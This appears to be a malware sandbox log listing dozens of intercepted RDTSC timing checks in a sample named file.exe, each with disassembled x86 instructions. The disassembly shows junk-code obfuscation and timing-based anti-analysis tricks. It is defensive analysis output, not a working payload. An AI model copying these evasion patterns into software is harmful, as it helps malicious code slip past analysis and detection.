Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E033F second address: 53E0343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C049D second address: 53C04B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov si, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0064E5702Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0DD2 second address: 53D0DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0DD6 second address: 53D0DF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E57039h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0DF3 second address: 53D0DF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0DF8 second address: 53D0E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, 2Fh 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0064E5702Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0E0F second address: 53D0E65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F00646A437Bh 0x0000000b sbb esi, 3E1ECFFEh 0x00000011 jmp 00007F00646A4389h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007F00646A4381h 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F00646A437Dh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E00F8 second address: 53E00FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54006E8 second address: 54006EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54006EC second address: 54006F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54006F2 second address: 54006F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54006F9 second address: 5400747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F0064E5702Ah 0x0000000d push eax 0x0000000e jmp 00007F0064E5702Bh 0x00000013 xchg eax, ebp 0x00000014 jmp 00007F0064E57036h 0x00000019 mov ebp, esp 0x0000001b jmp 00007F0064E57030h 0x00000020 xchg eax, ecx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov dx, ax 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5400747 second address: 5400760 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx eax, dx 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c movzx esi, di 0x0000000f mov dh, 6Eh 0x00000011 popad 0x00000012 xchg eax, ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5400760 second address: 5400764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5400764 second address: 540076A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 540076A second address: 540076F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 540076F second address: 5400793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, C441h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [76FA65FCh] 0x00000010 jmp 00007F00646A437Ch 0x00000015 test eax, eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5400793 second address: 5400797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5400797 second address: 540079B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 540079B second address: 54007A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54007A1 second address: 5400822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 7721h 0x00000007 pushfd 0x00000008 jmp 00007F00646A437Eh 0x0000000d sbb eax, 4D06CCB8h 0x00000013 jmp 00007F00646A437Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c je 00007F00D61C7510h 0x00000022 pushad 0x00000023 pushad 0x00000024 push esi 0x00000025 pop edx 0x00000026 mov al, 55h 0x00000028 popad 0x00000029 jmp 00007F00646A4383h 0x0000002e popad 0x0000002f mov ecx, eax 0x00000031 jmp 00007F00646A4386h 0x00000036 xor eax, dword ptr [ebp+08h] 0x00000039 jmp 00007F00646A4381h 0x0000003e and ecx, 1Fh 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5400822 second address: 5400828 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5400828 second address: 54008DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F00646A4380h 0x00000009 jmp 00007F00646A4385h 0x0000000e popfd 0x0000000f push esi 0x00000010 pop edi 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 ror eax, cl 0x00000016 jmp 00007F00646A437Ah 0x0000001b leave 0x0000001c jmp 00007F00646A4380h 0x00000021 retn 0004h 0x00000024 nop 0x00000025 mov esi, eax 0x00000027 lea eax, dword ptr [ebp-08h] 0x0000002a xor esi, dword ptr [00A92014h] 0x00000030 push eax 0x00000031 push eax 0x00000032 push eax 0x00000033 lea eax, dword ptr [ebp-10h] 0x00000036 push eax 0x00000037 call 00007F0069054BFDh 0x0000003c push FFFFFFFEh 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007F00646A437Eh 0x00000045 and esi, 45EB8FC8h 0x0000004b jmp 00007F00646A437Bh 0x00000050 popfd 0x00000051 pushfd 0x00000052 jmp 00007F00646A4388h 0x00000057 and esi, 750A9228h 0x0000005d jmp 00007F00646A437Bh 0x00000062 popfd 0x00000063 popad 0x00000064 pop eax 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007F00646A4380h 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54008DC second address: 54008E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54008E0 second address: 54008E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54008E6 second address: 5400932 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E5702Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ret 0x0000000a nop 0x0000000b push eax 0x0000000c call 00007F0069807928h 0x00000011 mov edi, edi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 pushfd 0x00000019 jmp 00007F0064E57033h 0x0000001e xor cl, 0000007Eh 0x00000021 jmp 00007F0064E57039h 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5400932 second address: 540094E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A4381h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 540094E second address: 5400954 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0019 second address: 53B0073 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A4381h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F00646A437Eh 0x0000000f push eax 0x00000010 jmp 00007F00646A437Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 call 00007F00646A437Bh 0x0000001e pop ecx 0x0000001f jmp 00007F00646A4389h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0073 second address: 53B0090 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E57031h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0090 second address: 53B0096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0096 second address: 53B0104 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 pushfd 0x00000007 jmp 00007F0064E5702Dh 0x0000000c add ecx, 761B2B36h 0x00000012 jmp 00007F0064E57031h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b and esp, FFFFFFF8h 0x0000001e jmp 00007F0064E5702Eh 0x00000023 xchg eax, ecx 0x00000024 pushad 0x00000025 mov di, si 0x00000028 pushfd 0x00000029 jmp 00007F0064E5702Ah 0x0000002e jmp 00007F0064E57035h 0x00000033 popfd 0x00000034 popad 0x00000035 push eax 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 mov cx, bx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0104 second address: 53B0149 instructions: 0x00000000 rdtsc 0x00000002 mov edi, 1A5BB3FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ecx 0x0000000b jmp 00007F00646A437Eh 0x00000010 xchg eax, ebx 0x00000011 jmp 00007F00646A4380h 0x00000016 push eax 0x00000017 pushad 0x00000018 movsx ebx, ax 0x0000001b call 00007F00646A437Ah 0x00000020 mov dx, ax 0x00000023 pop eax 0x00000024 popad 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0149 second address: 53B014F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B014F second address: 53B0155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0155 second address: 53B0159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0159 second address: 53B015D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B015D second address: 53B017C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0064E57032h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B017C second address: 53B01DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F00646A4381h 0x00000009 jmp 00007F00646A437Bh 0x0000000e popfd 0x0000000f mov si, 246Fh 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 xchg eax, esi 0x00000017 jmp 00007F00646A4382h 0x0000001c push eax 0x0000001d jmp 00007F00646A437Bh 0x00000022 xchg eax, esi 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F00646A4385h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B01DB second address: 53B02B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E57031h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007F0064E5702Eh 0x00000011 xchg eax, edi 0x00000012 pushad 0x00000013 call 00007F0064E5702Eh 0x00000018 pushfd 0x00000019 jmp 00007F0064E57032h 0x0000001e sbb esi, 66671FB8h 0x00000024 jmp 00007F0064E5702Bh 0x00000029 popfd 0x0000002a pop ecx 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e mov ax, dx 0x00000031 pushfd 0x00000032 jmp 00007F0064E57037h 0x00000037 xor ax, FE2Eh 0x0000003c jmp 00007F0064E57039h 0x00000041 popfd 0x00000042 popad 0x00000043 xchg eax, edi 0x00000044 pushad 0x00000045 pushfd 0x00000046 jmp 00007F0064E5702Ch 0x0000004b sbb eax, 57A8BBA8h 0x00000051 jmp 00007F0064E5702Bh 0x00000056 popfd 0x00000057 mov ecx, 5F34329Fh 0x0000005c popad 0x0000005d test esi, esi 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F0064E57031h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B02B1 second address: 53B02F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F00D62126D0h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F00646A4385h 0x00000017 add cl, 00000026h 0x0000001a jmp 00007F00646A4381h 0x0000001f popfd 0x00000020 push eax 0x00000021 push edx 0x00000022 mov cx, 522Dh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B02F3 second address: 53B0310 instructions: 0x00000000 rdtsc 0x00000002 mov cx, E429h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0064E5702Bh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0310 second address: 53B0316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0316 second address: 53B031A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B031A second address: 53B031E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B031E second address: 53B0336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F00D69C532Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 mov si, EEC5h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0336 second address: 53B03D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 pushfd 0x00000007 jmp 00007F00646A437Ah 0x0000000c sbb al, 00000058h 0x0000000f jmp 00007F00646A437Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov edx, dword ptr [esi+44h] 0x0000001b jmp 00007F00646A4386h 0x00000020 or edx, dword ptr [ebp+0Ch] 0x00000023 jmp 00007F00646A4380h 0x00000028 test edx, 61000000h 0x0000002e jmp 00007F00646A4380h 0x00000033 jne 00007F00D6212663h 0x00000039 pushad 0x0000003a mov ebx, eax 0x0000003c call 00007F00646A437Ah 0x00000041 mov eax, 22E69AE1h 0x00000046 pop eax 0x00000047 popad 0x00000048 test byte ptr [esi+48h], 00000001h 0x0000004c jmp 00007F00646A437Dh 0x00000051 jne 00007F00D6212651h 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B03D2 second address: 53B03D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B03D6 second address: 53B03DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B03DC second address: 53B03F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0064E57031h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A082D second address: 53A0833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0833 second address: 53A0837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0837 second address: 53A0846 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0846 second address: 53A08A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E57034h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F0064E57032h 0x0000000f add ah, 00000008h 0x00000012 jmp 00007F0064E5702Bh 0x00000017 popfd 0x00000018 popad 0x00000019 and esp, FFFFFFF8h 0x0000001c jmp 00007F0064E57036h 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A08A1 second address: 53A08A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A08A5 second address: 53A08AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A08AB second address: 53A0943 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F00646A4381h 0x00000009 sub al, FFFFFF86h 0x0000000c jmp 00007F00646A4381h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 jmp 00007F00646A4381h 0x0000001b xchg eax, ebx 0x0000001c jmp 00007F00646A437Eh 0x00000021 xchg eax, esi 0x00000022 pushad 0x00000023 mov ebx, ecx 0x00000025 jmp 00007F00646A437Ah 0x0000002a popad 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F00646A437Ch 0x00000035 add cx, C0B8h 0x0000003a jmp 00007F00646A437Bh 0x0000003f popfd 0x00000040 jmp 00007F00646A4388h 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0943 second address: 53A0954 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 push edx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0954 second address: 53A0958 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0958 second address: 53A095E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A095E second address: 53A09C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F00646A4389h 0x00000009 or ax, 6766h 0x0000000e jmp 00007F00646A4381h 0x00000013 popfd 0x00000014 mov bl, al 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov esi, dword ptr [ebp+08h] 0x0000001c jmp 00007F00646A4383h 0x00000021 sub ebx, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F00646A4382h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A09C3 second address: 53A09C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A09C9 second address: 53A09CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A09CD second address: 53A09DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d movsx edi, si 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A09DD second address: 53A0A55 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F00646A4383h 0x0000000d xor ah, 0000005Eh 0x00000010 jmp 00007F00646A4389h 0x00000015 popfd 0x00000016 popad 0x00000017 je 00007F00D6219CEEh 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F00646A4383h 0x00000026 add si, 876Eh 0x0000002b jmp 00007F00646A4389h 0x00000030 popfd 0x00000031 push esi 0x00000032 pop edi 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0A55 second address: 53A0A5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0A5B second address: 53A0A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0A5F second address: 53A0AAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E5702Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 jmp 00007F0064E57036h 0x00000017 mov ecx, esi 0x00000019 jmp 00007F0064E57030h 0x0000001e je 00007F00D69CC926h 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0AAF second address: 53A0AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0AB3 second address: 53A0AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0AB7 second address: 53A0ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0ABD second address: 53A0B16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, EAC1h 0x00000007 mov si, 71FDh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test byte ptr [76FA6968h], 00000002h 0x00000015 pushad 0x00000016 pushad 0x00000017 movzx esi, bx 0x0000001a pushfd 0x0000001b jmp 00007F0064E57031h 0x00000020 sub eax, 443A9BC6h 0x00000026 jmp 00007F0064E57031h 0x0000002b popfd 0x0000002c popad 0x0000002d mov di, si 0x00000030 popad 0x00000031 jne 00007F00D69CC8D6h 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov si, bx 0x0000003d mov cx, di 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0B16 second address: 53A0B31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F00646A437Ah 0x00000008 pop esi 0x00000009 mov ax, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov edx, dword ptr [ebp+0Ch] 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
